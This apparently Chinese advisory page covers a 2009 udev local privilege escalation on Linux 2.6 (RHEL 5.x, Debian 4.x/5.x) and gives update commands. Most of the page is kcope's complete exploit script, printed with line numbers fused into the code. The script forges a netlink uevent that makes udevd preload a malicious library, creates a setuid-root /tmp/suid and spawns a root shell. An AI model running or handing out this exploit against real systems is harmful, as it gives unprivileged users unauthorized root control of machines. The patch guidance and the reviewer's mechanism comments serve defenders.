Linux 本地提权漏洞:影响 RHEL 5.x(x86 和 x64)以及 Debian 4.x、5.x(x86 和 x64),请尽快更新 udev。
Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响) 修复方法(修复前请备份重要数据):
debian用户请执行apt-get update ; apt-get upgrade -y
centos用户请执行yum update udev
RedHat用户请使用官方rpm包更新或者购买RedHat的satellite服务。更新完成后,请确认系统中正在运行的 udevd 已是更新后的版本(必要时重启 udevd 或重启系统),否则旧进程仍可能受影响。
Linux 本地提权漏洞 —— Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit:
1#!/bin/sh2# Linux 2.63# bug found by Sebastian Krahmer4#5# lame sploit using LD technique6# by kcope in 20097# tested on debian-etch,ubuntu,gentoo8# do a 'cat /proc/net/netlink'9# and set the first arg to this10# script to the pid of the netlink socket11# (the pid is udevd_pid - 1 most of the time)12# + sploit has to be UNIX formatted text :)13# + if it doesn't work the 1st time try more often14#15# WARNING: maybe needs some FIXUP to work flawlessly116 collapsed lines
16## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang17
# NOTE(review): this listing was extracted with the code viewer's gutter
# numbers (1..131) fused into the text and a "116 collapsed lines" widget
# label left on the first line, so it is not valid shell or C as printed.
#
# What the script does, as far as the visible text shows:
#   * udev.c    - opens an AF_NETLINK / NETLINK_KOBJECT_UEVENT socket, takes
#                 nl_pid from argv[1], and sends a single message made of
#                 NUL-separated strings: an "event@path" header, then
#                 ACTION, DEVPATH, MAJOR, MINOR and SUBSYSTEM entries, plus
#                 an LD_PRELOAD entry naming /tmp/libno_ex.so.1.0. It then
#                 sleeps 10 seconds and execs /tmp/suid.
#   * program.c - built as the shared object libno_ex.so.1.0; its _init()
#                 calls setgid(0)/setuid(0), unsets LD_PRELOAD and runs
#                 "chown root:root /tmp/suid; chmod +s /tmp/suid".
#   * suid.c    - calls setgid(0)/setuid(0) and execs /bin/sh.
#
# The root cause is presumably that the unpatched udevd acts on a uevent
# message sent by an unprivileged local process instead of accepting such
# messages only from the kernel. That logic lives in udevd, not in this
# listing - confirm against the vendor advisory.
#
# Defender view: the artefacts visible here are /tmp/udev, /tmp/suid and
# /tmp/libno_ex.so.1.0, a root-owned set-uid/set-gid binary under /tmp, and
# an LD_PRELOAD variable carried inside a uevent environment. The fix the
# page gives is updating udev. Mounting /tmp nosuid would presumably only
# blunt this particular payload, since _init() already runs with whatever
# privileges the preloading process has.
18cat > udev.c << _EOF19#include <fcntl.h>20#include <stdio.h>21#include <string.h>22#include <stdlib.h>23#include <unistd.h>24#include <dirent.h>25#include <sys/stat.h>26#include <sysexits.h>27#include <wait.h>28#include <signal.h>29#include <sys/socket.h>30#include <linux/types.h>31#include <linux/netlink.h>32
33#ifndef NETLINK_KOBJECT_UEVENT34#define NETLINK_KOBJECT_UEVENT 1535#endif36
37#define SHORT_STRING 6438#define MEDIUM_STRING 12839#define BIG_STRING 25640#define LONG_STRING 102441#define EXTRALONG_STRING 409642#define TRUE 143#define FALSE 044
45int socket_fd;46struct sockaddr_nl address;47struct msghdr msg;48struct iovec iovector;49int sz = 64*1024;50
51main(int argc, char **argv) {52 char sysfspath[SHORT_STRING];53 char subsystem[SHORT_STRING];54 char event[SHORT_STRING];55 char major[SHORT_STRING];56 char minor[SHORT_STRING];57
58 sprintf(event, "add");59 sprintf(subsystem, "block");60 sprintf(sysfspath, "/dev/foo");61 sprintf(major, "8");62 sprintf(minor, "1");63
64 memset(&address, 0, sizeof(address));65 address.nl_family = AF_NETLINK;66 address.nl_pid = atoi(argv[1]);67 address.nl_groups = 0;68
69 msg.msg_name = (void*)&address;70 msg.msg_namelen = sizeof(address);71 msg.msg_iov = &iovector;72 msg.msg_iovlen = 1;73
74 socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);75 bind(socket_fd, (struct sockaddr *) &address, sizeof(address));76
77 char message[LONG_STRING];78 char *mp;79
80 mp = message;81 mp += sprintf(mp, "%s@%s", event, sysfspath) +1;82 mp += sprintf(mp, "ACTION=%s", event) +1;83 mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;84 mp += sprintf(mp, "MAJOR=%s", major) +1;85 mp += sprintf(mp, "MINOR=%s", minor) +1;86 mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;87 mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;88
89 iovector.iov_base = (void*)message;90 iovector.iov_len = (int)(mp-message);91
92 char *buf;93 int buflen;94 buf = (char *) &msg;95 buflen = (int)(mp-message);96
97 sendmsg(socket_fd, &msg, 0);98
99 close(socket_fd);100
101 sleep(10);102 execl("/tmp/suid", "suid", (void*)0);103}104
105_EOF106gcc udev.c -o /tmp/udev107cat > program.c << _EOF108#include <unistd.h>109#include <stdio.h>110#include <sys/types.h>111#include <stdlib.h>112
113void _init()114{115 setgid(0);116 setuid(0);117 unsetenv("LD_PRELOAD");118 execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);119}120
121_EOF122gcc -o program.o -c program.c -fPIC123gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles124cat > suid.c << _EOF125int main(void) {126 setgid(0); setuid(0);127 execl("/bin/sh","sh",0); }128_EOF129gcc -o /tmp/suid suid.c130cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0131/tmp/udev $1